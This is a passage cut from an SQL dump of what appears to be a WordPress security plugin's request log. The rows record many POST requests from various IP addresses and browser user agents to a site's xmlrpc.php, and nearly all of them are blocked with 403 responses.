Firefox\\/60.0\"}','MrvaQuZAkVT0xye7Ojs1tSmU',0,1679448626.5514,544,'','POST',403,0,515,0,1,'',0),('185.137.168.147',3112806547,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','wQK94Hps2bzagOfSoRI6J3vF',0,1679448635.3353,592,'','POST',403,0,515,0,1,'',0),('20.112.210.115',342938227,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','hL6dAUFQZJBtsoYIX9gfqK3C',0,1679448636.5544,578,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','vkb8uT6YMmwFoRSNA1f2Xzig',0,1679448640.5147,422,'','POST',404,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','kpL8Owc9mrvP3Cdx6HzjlJXh',0,1679448641.6746,380,'','POST',404,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','bklsPTtvnoqJGN8F5ZyahKA6',0,1679452787.3698,4312,'','POST',403,0,515,0,1,'',0),('150.60.232.16',2520573968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','cz1Z0Yx7VkLtdpaTqBgofmP3',0,1679452795.3458,560,'','POST',403,0,515,0,1,'',0),('80.88.87.187',1347966907,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','glWsyaJSOvp69GIq870iudht',0,1679452800.4512,564,'','POST',403,0,515,0,1,'',0),('104.219.248.74',1759246410,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','V3k4s69UZ5Lit8MNwqTRdalE',0,1679452804.0600,1225,'','POST',403,0,515,0,1,'',0),('89.46.105.156',1496213916,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','z2ZwbT0sDpQWeKm63nBPhHtg',0,1679452804.1666,1296,'','POST',403,0,515,0,1,'',0),('20.112.210.115',342938227,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','EOf8vjAsGMzi9enoL5XrDxu3',0,1679452822.3906,557,'','POST',403,0,515,0,1,'',0),('185.141.106.144',3113052816,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','8NtB7PlaYXFZgMJzmyvfcobD',0,1679452823.6547,540,'','POST',403,0,515,0,1,'',0),('85.113.30.187',1433476795,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','ErNjCLxugzUFGDqhRbwoacnH',0,1679456821.2425,4660,'','POST',403,0,515,0,1,'',0),('199.250.222.206',3355107022,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','5JSQKfL84mroFtMHWBcy0wE6',0,1679456824.3980,1505,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','2x7anr81PijW0GDI6tJCZKUo',0,1679456829.6022,563,'','POST',403,0,515,0,1,'',0),('103.82.27.22',1733434134,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','qJphx3nkLAUY21X5PGblTovt',0,1679456843.5363,635,'','POST',403,0,515,0,1,'',0),('1.117.201.233',24496617,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','NCPoV9BxvL28Sy7q0gKsXeMY',0,1679456848.4502,877,'','POST',403,0,515,0,1,'',0),('51.68.11.215',860097495,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','iOuDl7R9n2NWoyUJhdc48BXb',0,1679456859.8609,1573,'','POST',403,0,515,0,1,'',0),('103.179.190.218',1739833050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','0lO6mhc5CueEFsoDytUViqQa',0,1679456862.6340,568,'','POST',403,0,515,0,1,'',0),('51.158.145.98',866029922,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','FbxoyhKdCgPR5fpkY8US0lcT',0,1679459147.1912,1416,'','POST',403,0,515,0,1,'',0),('91.204.46.244',1540108020,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','OTP5zIevnpwGBMaLCk92JcrR',0,1679459144.2881,4352,'','POST',403,0,515,0,1,'',0),('65.21.78.116',1091915380,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','MWg2CYLqnUdmX7jS59Iwa4DT',0,1679459151.6325,570,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','P6ZiYCDN49GfrUoH2lqRX7xn',0,1679459159.1161,772,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','wGzeUXdyCbI05HFKhBi2flDJ',0,1679459159.7666,705,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','fxkrUsDaWHl9pLhdvFMwnTAC',0,1679459165.9154,562,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','nkytghNef9v3pPqzbwCQ4doM',0,1679459169.3090,546,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','clkabdWF4pKGvPA3JurBCHMI',0,1679459174.8983,545,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','6aKNDkr2hTEbfdQ4CmZpsIBH',0,1679461579.2711,1806,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','HhK4nMfyYue9617IUs8lQDWZ',0,1679461577.2533,4315,'','POST',403,0,515,0,1,'',0),('34.102.77.202',577129930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','BZnVrmTMW3i8ovKQHcEqUjSJ',0,1679461593.7534,1105,'','POST',403,0,515,0,1,'',0),('148.251.20.250',2499482874,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','NB42pHTfkSx5FZzdbCs0vge3',0,1679461597.1538,602,'','POST',403,0,515,0,1,'',0),('34.102.77.202',577129930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','dIaVLJCbFM2u6YOt8QKlB9EP',0,1679461602.2138,586,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','sb1GOdtBTXn3K7RuW9MA0e42',0,1679461605.1822,522,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','fytE6OCTSwrdZ9gmenvX8z1G',0,1679461613.6695,545,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','FVBJlyRLPMA2umbOG3WKdcDs',0,1679462487.8445,1415,'','POST',403,0,515,0,1,'',0),('146.196.108.94',2462346334,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','609dDC3bToQSqZVxspJzcYtH',0,1679462493.7685,563,'','POST',403,0,515,0,1,'',0),('45.76.223.150',760012694,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','aUWFHIqXuB92kpJt7MlKLiTy',0,1679462498.8126,561,'','POST',403,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dqyeCYLw4QHhApxsnbmTvot1',0,1679462503.3725,610,'','POST',403,0,515,0,1,'',0),('91.204.46.244',1540108020,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','GFk6MXrq4I237UtiWYsERnSu',0,1679462507.2220,550,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','xRDT0ju5nora8QYGvUMNB3VO',0,1679462509.1069,556,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','pPHtuhJDBr7IqsXvgbENW2CV',0,1679463069.2255,820,'','POST',403,0,515,0,1,'',0),('20.112.210.115',342938227,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','sgeztRdpw4ADP8m1ciBCNqb6',0,1679463072.6480,614,'','POST',403,0,515,0,1,'',0),('198.38.86.87',3324401239,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','fMQL2n3yFHVzPo96cZGwKkWO',0,1679463081.3622,614,'','POST',403,0,515,0,1,'',0),('66.113.188.151',1114750103,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','dXKwhDzAoYIrUPFakVQWOujL',0,1679463083.5441,538,'','POST',403,0,515,0,1,'',0),('177.52.160.19',2973016083,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','g8XCZKr3hsBO6o9iEDGpnlce',0,1679463087.3144,1131,'','POST',403,0,515,0,1,'',0),('167.114.98.248',2809291512,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','ZxlgARBbPp761TaJUYNEX8yH',0,1679463087.7587,1680,'','POST',403,0,515,0,1,'',0),('34.102.77.202',577129930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','LEBObTranRHjiFpNmqXc8Vez',0,1679463089.3698,1008,'','POST',404,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','SAI5DjEmyhts6wkGYCcLe3q7',0,1679463093.6694,1231,'','POST',403,0,515,0,1,'',0),('68.178.228.73',1152574537,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','kILyeh9v6xnFVS5u7rNJY4Xo',0,1679464093.1738,1881,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','A3gbTnFt6oievV5KGLWsIyYc',0,1679464091.8223,3940,'','POST',403,0,515,0,1,'',0),('185.165.31.185',3114606521,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','pSncDWEIt0dkw2U3xV4fezRL',0,1679464096.0701,627,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','r0O9lCBSmhKaubNV6csDQdTg',0,1679464103.6760,584,'','POST',403,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','qN4bhea6LpnJZtr07RH3PWyf',0,1679464107.0902,538,'','POST',403,0,515,0,1,'',0),('185.182.57.9',3115727113,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','a0d1fmXgA24nDbiEUOQH6uK8',0,1679464111.1222,581,'','POST',403,0,515,0,1,'',0),('103.82.27.22',1733434134,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','SJZRBHgpxank3hIfDWbOAC8K',0,1679464116.6668,568,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','74OINqpjBd5Ry06sStxPceF8',0,1679464130.4556,566,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','WcOa7ARMHodTy3rXuPCJjkhe',0,1679464972.5458,1962,'','POST',404,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','0ZzyHiwhxYq2EGtf8CskaU5B',0,1679464975.8097,474,'','POST',404,0,515,0,1,'',0),('119.59.96.60',2000379964,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','cC1DugFBJpME3mkGNUWQxKRS',0,1679464977.9571,1624,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','PCq5hjM3YvFnQsp2ZBoyeDdm',0,1679464978.3502,1436,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','C5gV2xX317adFsofGIQRjYbJ',0,1679464983.2615,1281,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','dLIkm7qTPGBwFfQWjyE2YRbK',0,1679464990.0668,679,'','POST',404,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','udm3zwNhHb8Gxa5enET2gf6Q',0,1679464990.6490,531,'','POST',404,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','kEBNg5lV8WeqDMjfPxmGRu6L',0,1679464993.2469,464,'','POST',404,0,515,0,1,'',0),('41.72.149.125',692622717,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','d8XskR0LlxBp3Kmiurz2TNPV',0,1679464994.8189,1239,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','mnZlKJILp9S2cg6z7MdHroFh',0,1679464995.2516,1129,'','POST',403,0,515,0,1,'',0),('103.154.184.56',1738192952,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','PVS3oJNYsmaKZ2qrp68MIkQd',0,1679465306.5334,4022,'','POST',403,0,515,0,1,'',0),('34.102.77.202',577129930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','a0bkszmhHY64RgZUytEG2fc8',0,1679465319.3391,685,'','POST',403,0,515,0,1,'',0),('167.114.98.248',2809291512,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','jnlf5AB09C3YuvrxNX4KVZgQ',0,1679465324.5289,681,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','37fXWQ6qJe1LgCRo9tmPFvzE',0,1679465332.4750,1074,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ZgKFkVbe5qasARIQd6x0EfwW',0,1679465336.0364,1331,'','POST',403,0,515,0,1,'',0),('200.63.99.32',3359597344,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','TlK5EpPA9kuHzOt3U8v7WYVS',0,1679465344.9168,666,'','POST',403,0,515,0,1,'',0),('199.250.222.206',3355107022,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','xNAwFQoqYIzhu4e2Xf1btdaH',0,1679465868.7438,3976,'','POST',403,0,515,0,1,'',0),('51.89.98.142',861495950,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','y1DRhiN5HGLndc0Fv2bKUVIE',0,1679465884.0090,597,'','POST',403,0,515,0,1,'',0),('135.181.136.149',2276821141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','zvd39V0DNmCHnkYPa8WAZpwO',0,1679465896.4333,575,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','l9d07pe5xtYBFoaZVI6fRXQc',0,1679466592.1221,1605,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','dJ5jb1tF3LRPZIxClq2D7kK9',0,1679466590.3553,4010,'','POST',403,0,515,0,1,'',0),('107.180.109.52',1806986548,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','EwJV46m3eKPsiW1vyuhSFoB7',0,1679466597.1589,621,'','POST',403,0,515,0,1,'',0),('80.88.87.187',1347966907,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','dDpYAyUvmgV0nEMzwNWSrjLu',0,1679466597.8892,612,'','POST',403,0,515,0,1,'',0),('185.182.56.240',3115727088,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','iUQZflCyN2BDt1uRKw8nhkq6',0,1679466616.8438,2778,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','2Ykbiger1ZPfJAswIDSmca7n',0,1679466619.6615,657,'','POST',404,0,515,0,1,'',0),('150.60.232.16',2520573968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','FPtc943y6Hf2WdmEu71XvjNC',0,1679466747.8732,3255,'','POST',403,0,515,0,1,'',0),('80.88.87.187',1347966907,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qECLbWMkv4BPGYcxoXwryH7A',0,1679466758.2683,783,'','POST',403,0,515,0,1,'',0),('80.88.87.187',1347966907,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','anUDdvyg07pmW5bJXcZklhti',0,1679466760.6919,423,'','POST',404,0,515,0,1,'',0),('43.135.100.126',730293374,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','6XDaMHy3QjCPhd1KnASkt7E9',0,1679466766.4890,743,'','POST',403,0,515,0,1,'',0),('77.68.64.24',1296318488,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 